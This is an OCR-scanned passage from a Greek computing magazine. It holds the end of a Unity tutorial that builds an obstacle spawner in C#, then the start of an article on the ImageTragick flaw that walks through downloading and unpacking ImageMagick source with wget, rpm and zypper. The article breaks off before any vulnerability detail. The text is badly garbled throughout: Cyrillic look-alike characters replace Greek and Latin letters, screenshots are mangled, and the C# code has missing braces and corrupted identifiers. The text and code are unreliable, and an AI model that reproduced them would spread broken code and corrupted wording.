το αντικείµενο δημιουργούνται κι όλα τα αντικείµενα-παιδιά, που βρίσκονται κάτω 
апо αυτό, διατηρώντας όλες τις ιδιότητές τους. Н μέθοδος εἰναι επίπονη για τον 
επεξεργαστή και πρέπει να αποφεύγεται η χρήση της για µεγάλο αριθµό αντικει- 
μένων ταυτόχρονα. Αν χρειαστεί να γίνει κάτι τέτοιο προτείνεται η χρήση object 
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pools, δηλαδή πινάκων (ή λιστών) апо батеОбјесїѕ, τα οποία αρχικοποιούνται κατά 
τη φόρτωση της εκάστοτε πίστας και πριν δοθεί ο χειρισμός στον παίχτη, δηλαδή 
στη μέθοδο Awake. 


-. Με επιλεγμένο το Obstacle στο παράθυρο Hierarchy, αναθέτουµε το νέο script 
στο СатеОбјесї Obstacle κάνοντάς то drag апа drop από το παράθυρο Project, 
στον Inspector. Σε αυτό το σηµείο μπορούμε να ελέγξουμε την κίνηση του 
εμποδίου, τρέχοντας την σκηνή µας κι αλλάζοντας την τιµή του πεδίου Speed 
του εμποδίου. 


ΕΘ йу Personal (84 -Game Project Sphere - РС Μας & Linux Standalone* «ὈΧ112. 
Fie T 


Озат у 


=| Layer [Datan 


9. 
anmaya соян! 
ха Ју εἴ -] 


Οι καμπύλες Bézier παίρνουν ονόματα ανάλογα µε το βαθµό των 
συναρτήσεων που χρησιμοποιούνται για να τις απεικονίσουν. 


"θέτοντας για ταχύτητα του εμποδίου µια θετική τιμή, το βλέπουμε να κινείται 
προς τα δεξιά. Μια αρνητική ταχύτητα θα το κάνει να κινηθεί προς τα αριστε- 


ρά. 
e Στο παράθυρο project δημιουργούμε ένα véo φάκελο µε буора "Resources". 


• Тоу επιλέγουμε (σαν να θέλαμε να δούµε τα περιεχόμενά του) και σέρνουμετο 
СатеОбјесї Obstacle апо το παράθυρο Hierarchy, στο παράθυρο project. 


._ Όταν δημιουργηθεί, το σβήνουµε ато την σκηνή επιλἐγοντάς то και πατώντας 
[Delete]. 


Γεννήτριες εμποδίων 


Ας nepåoovue στη δηµιουργία των αντικειμένων που θα εἰναι υπεύθυνα για την 
εμφάνιση εμποδίων στην πίστα. Τα αντικείµενα αυτά θα εἰναι τοποθετημένα στο 
µέσο των νοητῶν γραμμών της πίστας (στις θέσεις που μπορεί να πηδάει η μπάλα), 
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WOTE ма μπορούμε ανά πάσα отіүрӯ уа та κάνουμε та εμπόδιάτους να κινούνται αρι- 
στερά ἡ δεξιά. Στον φάκελο Scripts δημιουργούμε ένα νέο αρχείο κώδικα, µε όνομα 
Ѕрампег.сѕ. Σε αυτό προσθέτουμε τον ακόλουθο κώδικα: 


using UnityEngine; 
namespace Deltahacker 
public class Spawner : MonoBehaviour 
| public GameObject ObstaclePrefab; 
public float Speed; 


public float Frequency; 
public FloatRange WidthModifier ; 


private float lastSpawn; 
public void Update() 
if (Time.time >= lastSpawn + Frequency) 


lastSpawn = Time.time; 
spawnObstacle(); 


[ 
private void ѕрампОбѕїас1е() 


Obstacle.Instantiate(new InitializationData() 
{ 

Position = transform.position, 

Rotation = transform.rotation, 

Prefab = ObstaclePrefab 
}, WidthModifier .Random(), Speed); 


} 


[System. Serializable] 
public struct FloatRange 


| public float Min; 

public float Max; 

public float Random() 

: return ОпіуЕпріпе. Капаот. Капре(Міп, Max); 
° } 
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Αρχικά δηλώνουμε κάποια πεδία μεταβλητών που θα χρησιμοποιήσουμε. Το 
ObstaclePrefab δηλώνει το προκατασκευασµένο αντικείµενο που χρησιμοποιούμε 
για τα εμπόδια. Το Speed δηλώνει την ταχύτητα που θα περάσουμε στο εμπόδιο 
κατά την κατασκευή του. Το Егедиепсу δηλώνει τη συχνότητα που θα εμφανίζονται 
τα εμπόδια και, τέλος, το struct WidthModifier δηλώνει το εύρος των µηκών των 
εμποδίων. Δεύτερο struct για σήµερα, οπότε ας εξηγήσουμε λίγο παραπάνω την KA- 
τάσταση. 


Στη Οὔ υπάρχει τρόπος να κάνουμε μια τιμή να περιλαμβάνει éva μικρό αριθµό από 
μεταβλητές, συχνά συσχετιζόµενες. Αυτό επιτυγχάνεται µε τη χρήση ενός struct. 
Πολύ κοινή τους χρήση εἰναι, π.χ., για τα συστήµατα συντεταγμένων. Το Vector3 που 
χρησιμοποιήσαμε στον κώδικα των εμποδίων, εἰναι ένα struct που µας το δίνει έτοι- 
но η Unity και περιλαμβάνει τρία floats — éva για κάθε άξονα (х, у και z). Μπορεί να 
μοιάζουν πολύ µε κλάσεις, αλλά δεν εἰναι. Αν και δεν πρόκειται τόσο για θέµα του 
προγραμματισμού βιντεοπαιχνιδιών боо της Οὔ, ενδεχομένως να τα μελετήσουμε 
περισσότερο σε επόμενο άρθρο. 


Στο παραπάνω struct λοιπόν έχουµε ένα ζευγάρι από floats που υποδηλώνουν την 
ελάχιστη και τη μέγιστη τιµή που θα χρησιμοποιούμε για να τροποποιήσουµε то 
μήκος των εμποδίων. Μέσα στο (біо το struct, για ευκολία, δηλώνουμε µια µἐθο- 
бо Random, η οποία χρησιμοποιώντας την κλάση Random της Unity επιστρέφει ένα 
ψευδοτυχαίο αριθµό στο εύρος που δηλώσαμε. 


О υπόλοιπος κώδικας εἰναι κι εδώ απλός. Στην μέθοδο Update ελέγχουμε αν έχει 
περάσει το χρονικό διάστηµα που έχουµε ορίσει ως συχνότητα (συγκρἰνοντάς то µε 
τον τρέχοντα χρόνο) και δημιουργούμε ένα νέο εμπόδιο µε τυχαίο μήκος, στην ἴδια 
θέση που βρίσκεται о ѕрампег. 


Επιστρέφοντας στη Unity, wpa να δημιουργήσουμε μερικούς spawners. 


• Στο μενού СатеОбјесї επιλέγουμε Create Empty — ἡ πατάµε το συνδυασμό 
πλήκτρων [CTRL+Shift+N]. 


Ονομάζουμε το νέο αντικείµενο "Ѕрампег". 


• Апо το παράθυρο του project σέρνουµε το αρχείο κώδικα που δημιουργήσαμε 
λίγο πριν στον Inspector, WOTE να το προσκολλήσουµε στον Ѕрампег. 


• Στο νέο Component που θα δημιουργηθεί θέτουµε το Obstacle Prefab ото 
prefab Obstacle που έχουμε ήδη δημιουργήσει, κάνοντας κλικ στο στόχο στα 
δεξιά της τιμής κι επιλέγοντας το prefab από το tab Assets, στο παράθυρο που 
θα δημιουργηθεί. 


Στη φάση αυτή εἰναι καλό να δημιουργήσουμε éva prefab και αυτού του αντικειµέ- 
νου, WOTE να µη χρειάζεται να κάνουμε την ἰδια διαδικασία κάθε фора που θέλουμε 
να προσθέσουμε µια έξτρα γεννήτρια εμποδίων στην σκηνή. 


e Σέρνουµε το αντικείµενο Spawner, апо το παράθυρο Hierarchy στον φάκελο 
Resources του παραθύρου Project. Μια και θα χρησιμοποιήσουμε то αντικείµε- 
νο που υπάρχει στη σκηνή, δεν το σβήνουμε (όπως κάναμε µε το εμπόδιο) και 
συνεχίζουμε επιλέγοντάς το στο παράθυρο Hierarchy. 
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Στο Transform component του, θέτουµε Position = (5, 0.5, -7.5). 
Θέτουμε Speed = -1... 
„кає Frequency = 3. 


Επεκτείνουµε το πεδίο Width Modifier ώστε να δούµε τις τιµές του, αν δεν 
φαίνονται ήδη, και θέτουµε Мїп = 01, Мах = 2.5. 

Αν όλα πήγαν καλά καιτρέξουµε τη σκηνή, η γεννήτρια εμποδίων θααρχίσεινα 
δημιουργεί εμπόδια µε τυχαίο μήκος που κινούνται προς τα αριστερά. 


гг Έστε” 


Spanner 
Dbstacla(Clene) 
ьа (Сее) 
οσα 


Н γεννήτρια εμποδίων εν δράσει! 


Σας παροτρύνουµε να παίξτε µε τις τιµές του Ѕрампег. Τοποθετήστε περισσότερες 
γεννήτριες εμποδίων στην σκηνή, είτε αριστερά είτε δεξιά της, µε διαφορετικές 
τιµές ταχύτητας και συχνότητας. Απλά έχετε κατά νου ότι οι γεννήτριες που είναι 
τοποθετημένες στην αριστερή πλευρά πρέπει να έχουν θετική ταχύτητα, ενώ αυ- 
τές που εἰναι τοποθετημένες στη δεξιά πρέπει να έχουν αρνητική. 


Όπως πάντα, µπορείτε να βρείτε την τελευταία ἐκδοση του κώδικα στο GitHub 


( 


), ενω περιμένουμε και τις όποιες ATO- 


ρίες σας апо το site του περιοδικού. Στο επόμενο τεύχος θα κάνουμε τη σφαίρα του 
παίκτη να συγκρούεται µε τα εμπόδια, χρησιμοποιώντας την ενσωματωμένη µηχα- 
γή physics που µας προσφέρει η Unity. 
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Skill: Intermediate 
Tags: ImageMagick, ImageTragick, delegation 


H Αποκάλυψη µιας 
Σοβαρής Αδυναμίας 


Στο άρθρο που ξεκινά απὀ τη σελίδα 14 του τεύχους παρουσιάσαµε την 
εξαιρετικά χρήσιμη κι ευρέως διαδεδομένη σουίτα του ImageMagick. Συνεχίσαμε 
περιγράφοντας µια αδυναμία της που ανακαλύφθηκε πρόσφατα, η οποία έχει 
σοβαρές συνέπειες για την ασφάλεια της πλειονότητας των webservers στο 
Διαδίκτυο. Σ' αυτό το άρθρο δείχνουμε πώς σκέφτεται κι εργάζεται ἑνας 
χρήστης του Linux µε βασικές γνώσεις, στην προσπάθειά του να κατανοήσει τη 
φύση του προβλήματος που ταλανίζει τη σουίτα. 


του Πάνου Γεωργιάδη 


Όλοι µας κἀποιαστιγµή έχουμε ἐρθειαντιμέτωποι μετημετατροπήμµιας εικόνας ато 
ένα format (T.x., JPEG) σε κάποιο алло (π.χ., PNG). Λόγω συνήθειας, ο μέσος χρήστης 
θα χρησιμοποιήσει éva πρόγραµµα επεξεργασίας εικόνας, όπως, T.X., το Photoshop 
ή το GIMP - ἡ ακόµα και τον προεγκατεστηµμένο image viewer του λειτουργικού συ- 
στήµατος. Εμείς πάλι νιώθουμε πολύ άνετα όταν δουλεύουμε апо το τερματικό της 
γραμμής εντολών, σε βαθμό που να κάνουμε ότι μπορούμε ώστε να µην το εγκα- 
ταλείπουµε και να εργαζόµαστε διαρκώς από εκεί. Έστω λοιπόν ότι έχουµε βρει 
την εικόνα που θέλουμε, το URL της οποίας εἰναι το http://i.imgur.com/u68Vakj.jpg 
(το αρχείο εἶναι προσβάσιμο "και: апо НТТР link). Πρόκειται για µια εικόνα JPEG 
κι ας υποθέσουμε ότι επιθυμούμε να τη µετατρέψουµε σε εικόνα PNG. (Συνήθως 
συμβαίνει το αντίστροφο, όμως γιατην παρουσίασή µας δεν έχει καμία σημασία апо 
ποιο format ξεκινάμε και σε ποιο καταλήγουμε.) Επίσης, επειδή το "u68Vakj" δεν µας 
πολυαρέσει ως όνοµα αρχείου, θα το αλλάξουμε στο κάπως βαρετό αλλά απείρως 
πιο ανθρώπινο "image". 


Προκειμένου λοιπόν να πετύχουμε τα προηγούμενα, θα πρέπει αρχικά να κατεβά- 
σουµε την εικόνα στον υπολογιστή µας -αν δεν την έχουµε ήδη τοπικά-, και στη 
συνέχεια να χρησιμοποιήσουμε την κατάλληλη εντολή για την μετατροπή της. Па 
το downloading θα καταφύγουμε στο γνωστό utility ονόματι wget: 


рапоѕ@оһћѕиѕе: ~> wget 'http://i.imgur.com/u68Vakj.jpg' 

--2016-05-17 18:39:03-- һр: //1. ітриг.сот/иб8Макј. јр= 

Resolving i.imgur.com (1.ітриг. сот)... 23.235.43.193 

Connecting to i.imgur.com (1.1тгиг.сот)|23.235.43.193|:80... connected. 
HTTP request sent, awaiting response... 200 OK 

Length: 35377 (35K) [image/jpeg] 
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Saving to: 'u68Vakj.jpg' 
2016-05-17 18:39:03 (499 KB/s) - 'u68Vakj.jpg' saved [35377/35377] 


Па τη μετατροπή апо то format JPEG στο format PNG, χρησιμοποιούμε την εντολή 
convert ως εξής: 


рапоѕ@оһћѕиѕе:~> convert u68Vakj.jpg image.png 


Βεβαιωνόμαστε ότι η μετατροπή πέτυχε κι ότι μπορούμε у ανοίξουμε και να δούμε 
το PNG, site εντοπίζοντας το νέο αρχείο апо τον file manager και κάνοντας δεξί 
κλικ πάνω του, είτε πληκτρολογώντας ото τερματικὀ µας το ακόλουθο: 


рапоѕ@оһѕиѕе:~> display image.png 


Με τον δεύτερο τρόπο, θα παρατηρήσετε ότι TO image.png ανοίγει σ éva παράθυρο 
του ImageMagick. Αφού σιγουρευτούμε ότι όλα πήγαν καλά, κλείνουμε το παράθυρο 
WOTE να επανέλθει ο έλεγχος ото терратіко κι αν θέλουμε διαγράφουµε τα αρχεία 
u68Vakj.jpg και image.png (δεν τα χρειαζόμαστε алло). 


Activities [9 Display ~ Тие 18:49 


File Edit View 5 Terminal Help 
panos@ohsuse:~> wget 'http://i.imgur.com/u68Vakj .jpg' 
:48:32-- ht i. imgur .com/u68Vakj -jpg 


Resolving i.imgur.com (i.imgur.com)... 23.235.43.193 

Connecting το i.imgur.com (ἠ.πριγ.εοπ)|23.235.43.193|:80... connected. 
HTTP request sent, awaiting response... 200 OK 

Length: 35377 (35K) [image/jpeg] 

Saving to: ‘u68Vakj.jpg’ 


panos@ohsuse:” 


==>] 35,377 


2016-05-17 18:48:32 (497 KB/s) - ʻ‘u68Vakj.jpg’ saved [35377/35377] ImageMagick: image.png 


panos@ohsuse:~> convert u68Vakj.jpg image.png 


drwxr-xr-x 2 panos users 6 May 17 
drwxr-xr-x 2 panos users 6 May 17 
6 May 17 
6 May 17 
210K May 17 
6 May 17 
drwxr-xr-x 2 panos users 6 May 17 
drwxr-xr-x 2 panos users 6 May 17 
drwxr-xr-x 2 panos users 24 May 17 
x 2 panos users 6 May 17 
- 1 panos users 35K Jun 20 
x 2 panos users 6 May 
panos@ohsuse:~> display image.png 


Εργασία από το ωραιότατο τερματικό µας, χωρίς τύψεις ка! µε κέφι που περισσεύει: Κατεβάζουμε 
πρώτα την επιθυμητή εικόνα JPEG µε το wget (1), τη µετατρέπουµε σε µορφή PNG µε то convert (2), 
βεβαιωνόµαστε ότι όλα πήγαν κατ' ευχήν µε το προγραμματάκι ονόματι display (3). 
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Τι συμβαίνει πίσω από την κουρτίνα; 


Επειδή µας άρεσε η προηγούµενη εμπειρία μετατροπής format εικόνας ато то τερ- 
ματικό, σκεφτήκαμε у ανοίξουµε το тап раде του convert (πληκτρολογώντας "тап 
convert", χωρίς τα εισαγωγικά), ἐτσι WOTE να μάθουμε περισσότερα γι αυτό το TA- 
νίσχυρο, κατά πως φαίνεται, εργαλείο. Διαβάζοντας το тап раде, δεν αργήσαμε να 
συνειδητοποιήσουµε ότι υπάρχει ένας *акора* πιο εύκολος και βολικός τρόπος για 
να κάνουμε την προηγούμενη εργασία. Δείτε: 


рапоѕ@оћѕиѕе : ~> 


Activities GNOME Terminal v Tue 19:12 
panos@ohsuse:~ 


File Edit View Search Terminal Help 


panos@ohsuse: ~> 

panos@ohsuse:~> convert 'http://i.imgur .com/u68Vakj.jpg' image.png 
panos@ohsuse:~> 15 -lh 

total 212K 
drwxr-xr-x 
drwxr-xr-x 
drwxr-xr-x 
drwxr-xr-x 


2 panos users May :08 

2 panos users May їз 

2 panos users May Бас! 

2 рапоѕ иѕегѕ Мау Еа 
-rw-r--r-- 1 panos users May 112 image.png 
drwxr-xr-x 2 panos users May 13 
drwxr-xr-x 2 panos users May Sta 
drwxr-xr-x 2 panos users May ¿13 
drwxr-xr-x 2 panos users May :68 
drwxr-xr-x 2 panos users May „1З 
drwxr-xr-x 2 


panos users May їз 
рапоѕӣ@оһћѕиѕе: ~> Е 


Κατέβασμα εικόνας και μετατροπή της σε διαφορετικό format апо то 
τερματικό, δίνοντας *ріа* μόνο εντολή. 


Στο παραπάνω παράδειγµα δίνουμε ως εἰσοδο απευθείας το URL προς την εικόνα 
που επιθυμούμε να µετατρέψουμε, χωρίς να χρειάζεται va TNV κατεβάσουµε πρώτα 
στον υπολογιστή µας. Μάλιστα и' αυτόν τον τρόπο γλιτώνουµε και το τελευταίο 
(προαιρετικό) βήμα της διαγραφής της αρχικής εικόνας, αφού δεν χρειάστηκε καν 
να την κατεβάσουμε. О, ναι, αυτό εἶναι πραγματικά βολικό! Είναι αξιέπαινη αυτή η 
άνετη αναγνώριση του НТТР link στην εἰσοδο, то ότι δηλαδή αντιστοιχεί σε εικόνα. 
Πώς να επιτυγχάνεται άραγε αυτός ο αυτοματισμός; 


Αυτό ήταν! Πλέον το αξιέπαινο έγινε αξιοπερίεργο, και το αξιοπερίεργο µε τη σειρά 
του εἰναι αρκετό για να ενεργοποιήσει τη "δική µας” περιέργεια. Ως αναγνώστες 
του деќаНаскег, η περιέργεια για εμάς δεν εἰναι παρά η κινητήρια δύναμη της πνευ- 
µατικής ικανοποίησης, η οποία µας βοηθά ото να μαθαίνουμε, να συνεχίζουμε και να 
προσπαθούμε διαρκώς. Κάπως έτσι λοιπόν ξεκινήσαμε το ταξίδι µας για την απο- 
κάλυψη της μαγείας που συμβαίνει πίσω апо την εντολή convert, προκειµένου να 
εξιχνιάσουµε το πώς éva link γίνεται αποδεκτό στη θέση µιας εικόνας. 
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Αρχικά, θέλουμε να µάθουµε апо πού ακριβώς προέρχεται αυτή η εντολή convert. 
Ποιο πακέτο περιλαμβάνει το σχετικό εκτελέσιμο; Δουλεύουμε στο αγαπημένο рас 
openSUSE Leap, οπότε θα καταφεύγουμε τώρα στο εργαλείο rom. Πα όσους δεν 
γνωρίζουν τα βασικά του rpm (х т.Е. είναι ισχυρή μάστιγα το Debian και το ΑΡΤ :Р), 
να πούμε ὁτι µε την παράμετρο -q (query) δηλώνουμε ότι πρόκειται να ρωτήσουμε 
πληροφορίες για κάποιο αρχείο, ενώ και µε την παράμετρο -f (е) διευκρινίζουμε 
ότι επιθυμούμε να μάθουμε το буора του πακέτου που το περιλαμβάνει - αν φυσικά 
υπάρχει. Χρειάζεται να δώσουμε την πλήρη διαδρομή (full path) προς το υπό εξέτα- 
ση αρχείο (convert), το οποίο μαθαίνουμε µε τη βοήθεια του εργαλείου which: 


рапоѕ@оһћѕиѕе: ~> which convert 
/usr/bin/convert 


H πλήρης διαδρομή εἶναι η /usr/bin/convert. Επειδή όµως εἰμαστε λάτρεις της үрар- 
µής εντολών και του scripting, δεν χάνουμε ευκαιρία για "συμπύκνωση" κι ἔτσι πλη- 
κτρολογούμε: 


рапоѕ@оһћѕиѕе:~> rpm -qf $(which convert) 
ImageMagick-6.8.8.1-6.1.x86_64 


Ωραία. Βλέπουμε оті το convert προέρχεται апо το πακέτο ImageMagick, το οποίο 
έχουµε ήδη εγκατεστημένο στο σύστημά µας (συγκεκριµένα, την έκδοση 6.8.8.1-6.1, 
για επεξεργαστές αρχιτεκτονικής 64bit). Το επόμενο πράγμα που φυσιολογικά µας 
έρχεται κατά νου, είναι ότι θα χρειαστούµε τον πηγαίο κώδικα του ImageMagick. Σ' 
αυτόν θ' αναζητήσουμε περισσότερες πληροφορίες. Οφείλουµε λοιπόν να κατεβά- 
σουµε το SRPM (Source КРМ) της συγκεκριμένης ἐκδοσης που έχουµε εγκατεστη- 
μένη στον υπολογιστή µας. Έχουμε δύο επιλογές: 


1. ναπάρουμε то Source RPM με τη βοήθεια του package manager (гуррег) 
2. να βρούμε то archive του κώδικα και να το κατεβάσουµε ως éva απλὀ αρχείο 


Προκειμένου να καταστήσουµε το παρόν άρθρο λίγο περισότερο φιλικό προς όλες 
τις διανομές Linux, δεν θα βασιστούμε αποκλειστικά στο Ζγρρεί αλλά θα πάρουμε 
τον πηγαίο κώδικα µε τον παραδοσιακό τρόπο. Πα να κατεβάσουµε λοιπόν το σχε- 
τικό αρχείο, πρέπει πρώτα να γνωρίζουμε πού στο καλό βρίσκεται. Μια και εἰμα- 
στε στο openSUSE, ας ζητήσουμε апо το Ζγρρεί να µας επιστρέψει πληροφορίες 
περί του αποθετηρίου (repository) апо το οποίο έγινε η εγκατάσταση του πακέτου 
ImageMagick. 


Ως repository (φανταστείτε το σαν µια αποθήκη λογισμικού) ονομάζεται το µέρος 
στο οποίο πηγαίνει ο package manager, ψάχνει, βρίσκει και κατεβάζει та проүраџ- 
рата που του ζητάμε. Φανταστείτε то αν θέλετε σαν ἕναν τεράστιο σκληρό δίσκο, 
ре πάρα πολλά προγράµµατα. Ας ζητήσουμε εκείνες τις πληροφορίες που λέγαμε: 


рапоѕ@оһћѕиѕе:~> zypper se -is ІтареМаріс 
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Loading repository data... 

Reading installed packages... 

5 | Name | Туре | Version | Arch | Repository 
--+------------- +--------- +------------- +-------- +-------------------------- 
i | ImageMagick | package | 6.8.8.1-6.1 | х86_64 | Main Update Repository 

i | ImageMagick | package | 6.8.8.1-6.1 | x86_64 | openSUSE-Leap-42.1-Update 


Ωραία, βλέπουμε ότι το πακέτο ImageMagick εγκαταστάθηκε στο σύστημά µας 
апо το repository µε όνομα openSUSE-Leap-42.1-Update. Εξακολουθούμε όμως να 
μη γνωρίζουμε τη δικτυακή διεύθυνση του αποθετηρίου. Μπορούμε ωστόσο να τη 
βρούμε, ρωτώντας και πάλι τον раскаде тападег: 


рапоѕ@оһћѕиѕе:~> zypper lr -U | grep "ореп505Е-Геар-42.1-0рдате" 


9 | repo-debug-update-non-oss | openSUSE-Leap-42.1-Update-Debug-Non-0ss 
| No | ---- | Yes | http ://download.opensuse.org/debug/update/ 
leap/42.1/non-oss/ 

8 | repo-debug-update | openSUSE-Leap-42.1-Update-Debug 
| No | ---- | Yes | http://download.opensuse.org/debug/update/ 
1еар/42.1/055 
11 | геро-ирдаїе | openSUSE-Leap-42.1-Update 
| Yes ПЕЕ е5 | http://download. орепѕиѕе.огр/ирдаќе/ 


1еар/42.1/055/ 


Γνωρίζοντας πλέον τον σύνδεσμο του openSUSE-Leap-42.1-Update 
(http://download.opensuse.org/update/leap/42.1/0ss), ανοίγουμε τον αγαπημέ- 
νο µας web browser και ψάχνουμε να βρούμε το αρχείο вгс.грт της έκδοσης του 
ImageMagick που µας ενδιαφέρει. Μετά από λίγο, ἔχουμε το ακόλουθο URL: 


ћіїр://аомпіоаа.орепѕиѕе.огд/ирааїе/Іеар/42 .1/055/5гс/ітадеМадіск-6.8.8.1- 
61.ѕгс.грт 


Афоүа! Επιτέλους διαθέτουµε κάτι µε το οποίο μπορούμε να παίξουμε. 


Προετοιμάζουμε το έδαφος στον υπολογιστή µας, δημιουργώντας τον κατάλογο για 
την αποθήκευση του αρχείου µε τον κώδικα. Θα δημιουργήσουμε δύο καταλόγους, 
τους οποίους θα ονοµάσουµε before και after, κάτω από τον κατάλογο /tmp/test. 
Αυτό βέβαια δεν εἶναι υποχρεωτικό, αφού κάλλιστα µπορείτε να εργαστείτε στο 
home directory του χρήστη σας. Απλά, εμείς είμαστε λίγο παρανοϊκοί µε την TAKTO- 
ποίηση των καταλόγων και αρχείων στο σύστημά µας. Δείτε: 


panos@ohsuse:~> mkdir -p /tmp/test/{before,after} 
panos@ohsuse:~> cd /tmp/test/before 
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Activities @ Firefox ~ Tue 21:43 


Index of /update/leap/42.1/oss/src – Mozilla Firefox 


| Е Index of /update/leap... х \ Ф 


€) D downl 


Index of /update/leap/42.1/0ss/src 


Name Last modified Size 


Parent Directory - 

389-ds-1.3.4.5-3.1.src.rpm Əl-Dec-2015 18:00 3.2M Details 
ІтавеМаріск-6.8.8.1-6.1.=ғс.ғрт 87-0ес-2815 13:85 7.3M Details 
ImageMagick-6.8.8.1-9.1.src.rpa 87-May-2016 14:34 7.3M Details 


LibWNCServer-8.9.9 


rpm 84-Dec-2015 11:37 1.60 Details 


88-Dec-2015 18:51 7.2M Details 


11-Јап-2016 12:05 7.2M Details 


Меза-11.8.8-13 29-Jan-2016 11:56 7.2M Details 
Меѕа-11.0.8-142.2.5гс.ғрт 88-Apr-2016 11:52 7.2M Details 


Меѕа-11.0.8-145.1 


84-May-2916 12:39 7.2M Details 


ЕБЕ А 


MozillaFirefo .Б.зкс.грт 89-Ноу-2815 22:28 287M Details 


Ως χρήστες του openSUSE, µε τη βοήθεια του zypper είναι πολύ εύκολο να εγκαταστήσουµε το Source 
RPM ενός οποιουδήποτε πακέτου. Σημειώνουμε πάντως ότι το 2уррег δεν είναι απαραίτητο για τη 
λήψη Source RPMS. Αν μάλιστα έχουµε αρχίσει ν' ασχολούμαστε σχετικά πρόσφατα µε το Linux και 

δεν χάνουμε ευκαιρία για διερευνητική εργασία, αξίζει ίσως ν' αναζητήσουμε το Source RPM поо µας 
ενδιαφέρει "χωρίς" να καταφύγουµε στο ғуррег. 


Κατεβάζουμε το αρχείο SRPM, μέσα στον κατάλογο before: 


panos@ohsuse:/tmp/test/before> wget http://download.opensuse.org/update/ 
Іеар/42.1/055/5гс/ІтавеМаріск-6.8.8.1-6.1.5гс.грт 


Avoiyouue το πακέτο SRPM, χρησιμοποιώντας το εργαλείο ипгрт. Αν δεν το έχετε 
στο σὐστημάσας, μπορείτε να το αποκτήσετε τὠραεγκαθιστώντας το πακέτο build: 


panos@ohsuse:/tmp/test/before> sudo zypper -n іп build 
Το άνοιγμα του αρχείου ѕгс.грт γίνεται έτσι: 


panos@ohsuse:/tmp/test/before> ипгрт ІтареМаріск-6.8.8.1-6.1.5гс.грт 
ІтареМаріск-6.8.8.1-6.1.5гс.грт: 14979 blocks 


Ξέρετε κάτι; Βρισκόμαστε στο Linux, και στο Linux n ίδια δουλειά γίνεται µε περισσό- 
τερους апо έναν τρόπους. Εν προκειμένω, το 5гс.грт του ImageMagick αποσυμπιέ- 
ζεται και χωρίς το ипгрт, έτσι: 
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panos@ohsuse:/tmp/test/before 


File Edit View Search Terminal Help 


panos@ohsuse: /tmp/test/before> 
panos@ohsuse: /tmp/test/before> sudo zypper -n in build 
Loading repository data... 

Reading installed packages... 

Resolving package dependencies. . . 


sdtar и114 -uild-mkbaselibs uild-mkdrpms рег1-Сгурё-551еау ети-11пих-изег 


sdtar -uild-mkdrpms -erl-Crypt-SSLeay ети-11пих-изег 


new packages to install. 
Overall download size: 6.4 MiB. Already cached: © B. After the operation, additional 95.5 MiB will be used. 
Continue? [y/n/? shows all options] (y): y 
Retrieving package bsdtar-3.1.2-8.1.x86_64 (1/6), -9 KiB (111.8 KiB unpacked) 
Retrieving: bsdtar-3.1.2-8.1.x86_64.rpm . «. [done] 
Retrieving package perl-Crypt-SSLeay-0.72-2.2.x86_64 SIKA unpacked) 
Retrieving: perl-Crypt-SSLeay-0.72-2.2.x86_64.rpm . . [done] 
package build-mkbaselibs-2015110! «1 ΠΟΘΓΕΙ . 1 unpacked) 
: build-mkbaselibs-20151105-3.1.noarch. rpm . . [done] 
package qemu-linux-user-2.3.1-12.1.x86_64 κα. Mi unpacked) 
: дети-1іпих-иѕег-2.3.1-12.1.х86_64.грт 1 MiB/s)] 
Retrieving package build-20151105-3.1.noarch .3 Ki unpacked) 
Retrieving: build-20151105-3.1.noarch. rpm . see e e [done] 
Retrieving package build-mkdrpms-20151105-3.1.noarch .8 Ki .5 KiB unpacked) 
Retrieving: build-mkdrpms-20151105-3.1.noarch. rpm . [done] 
Checking for file conflict: ээ, . [done] 
Installing: bsdtar-3.1.2-8.1.x86_64 . . [done] 
Installing: perl-Crypt-SSLeay-0.72-2. S . [done] 
Installing: build-mkbaselibs-20151105-3.1.noarch . . [done] 
Installing: qemu-linux-user-2.3.1-1 x86_64 . [done] 
Installing: build-20151105-3.1.noarch .. . [done] 
Installing: build-mkdrpms-20151105-3.1.noarch . [done] 
panos@ohsuse: /tmp/test/before> 


Για την εξαγωγή των αρχείων που απαρτίζουν ένα οποιοδήποτε πακέτο RPM, το εργαλείο 
ипгрт αποτελεί άριστη επιλογή. Σε περίπτωση που δεν εἰναι παρὀν στο σύστημά рас, το 
φέρνουμε εγκαθιστώντας, µε то Ζγρρει, το πακέτο ονόματι build. Αλλά και η εγκατάσταση του 
build δεν είναι υποχρεωτική, αφού αντί για το ипгрт υπάρχει και δυνατότητα για χρήση του 
грт2срі (το οποίο είναι παρόν αµέσως µετά την εγκατάσταση του openSUSE). 


panos@ohsuse:/tmp/test/before> 


ImageMagick-6.6.8.9-doc.patch 
ImageMagick-6.6.8.9-examples.patch 
ImageMagick-6.7.6.1-no-dist-lzip.patch 
ImageMagick-6.8.4.0-dont-build-in-install.patch 
ImageMagick-6.8.4.0-rpath. patch 
ImageMagick-6.8.5.7-no-XPMCompliance.patch 
ImageMagick-6.8.8-1.tar.xz.asc 
ImageMagick-6.8.8.1-display-stdin.patch 
ІтареМаріск- СМЕ -2014-8354.раёсһ 
ІтареМаріск- СМЕ -2014-8355.раёсһ 
ІтареМаріск- СМЕ -2014-8562.раёсһ 
ІтареМаріск- СМЕ -2014-8716.раёсһ 
Ее ІтареМаріск-рат -ітр - сотргеѕѕіоп.раёсһ 


= ImageMagick.changes 
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ImageMagick.keyring 
ImageMagick. spec 
baselibs.conf 
disable_mat_test.patch 
14979 blocks 


Σε κάθε περίπτωση, παίρνουμε ὁλα τα αρχεία που απαρτίζουν το πακέτο. Το αρχείο 
που περιέχει τον πηγαίο κώδικα εἰναι το ImageMagick-6.8.8.1.tar.xz κι οφείλουμε να 
το αποσυμπιέσουµε: 


panos@ohsuse:/tmp/test/before> tar -xf ImageMagick-6.8.8-1.tar.xz 


Από προεπιλογή, η εξαγωγή των αρχείων θα γίνει σε έναν καινούργιο κατάλογο ονό- 
ματι ІтадемМадіск-6.8.8-1. Μεταβαίνουµε σ' αυτό το directory και βλέπουμε ταπερι- 
εχόμενά του: 


panos@ohsuse:/tmp/test/before> са ImageMagick-6.8.8-1 
panos@ohsuse:/tmp/test/before/ImageMagick-6.8.8-1> 15 


aclocal.m4 filters LICENSE NEWS. txt utilities 
AUTHORS. txt ImageMagick.spec.in m4 NOTICE version. sh 
ChangeLog images magick PerlMagick wand 
coders index.html Magick++ Platforms.txt winpath.sh 
common.shi.in Install-mac.txt magick.sh.in QuickStart.txt ww 

config Install-unix.txt Magickshr.opt README.txt 

configure Install-vms.txt Makefile.am ѕсгіріѕ 


configure.ac Install-windows.txt Makefile.in tests 


